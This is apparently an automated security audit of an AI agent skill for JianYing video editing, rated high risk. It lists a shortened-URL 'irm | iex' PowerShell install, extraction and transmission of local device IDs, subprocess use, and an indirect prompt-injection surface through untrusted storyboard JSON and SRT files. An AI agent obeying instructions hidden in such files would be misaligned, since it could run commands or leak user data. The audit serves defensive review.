jianying-editor
Fail
Audited by Gen Agent Trust Hub on Mar 6, 2026
Risk Level: HIGH
Findings: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The README.md recommends a one-click installation using a shortened URL (is.gd/rpb65M). Redirection services mask the final download target, so the user cannot see what will be fetched before running it, which is a significant security risk.
- [REMOTE_CODE_EXECUTION]: The installation command 'irm is.gd/rpb65M | iex' in README.md pipes the content of a remote script directly into the PowerShell interpreter. This allows arbitrary code execution on the user's system without any prior review of the script.
- [DATA_EXFILTRATION]: The file scripts/universal_tts.py contains logic to extract unique local identifiers (device_id and iid) from JianYing's configuration files and logs. These sensitive IDs are then transmitted to an external WebSocket endpoint (wss://sami.bytedance.com) to authenticate TTS requests.
- [COMMAND_EXECUTION]: Extensive use of the subprocess module is found across several files (scripts/api_validator.py, scripts/web_recorder.py, scripts/sync_jy_assets.py, tools/recording/recorder.py) to run system-level tools such as ffmpeg, ffprobe, and playwright. While necessary for the skill's functionality, this provides a powerful primitive for potential abuse.
- [PROMPT_INJECTION]: The skill exposes a surface for indirect prompt injection (Category 8) because it processes untrusted external data, such as storyboard JSONs and SRT subtitles, to automate video editing. Mandatory Evidence Chain:
  1. Ingestion points: storyboard.json (scripts/movie_commentary_builder.py) and SRT files (scripts/video_transcribe_and_match.py).
  2. Boundary markers: Absent in the prompts used to process these files.
  3. Capability inventory: Subprocess execution (ffmpeg), file system access (draft generation), and network operations.
  4. Sanitization: Limited sanitization is applied only to project names in scripts/core/project_base.py.
Recommendations
- AI detected serious security threats
Audit Metadata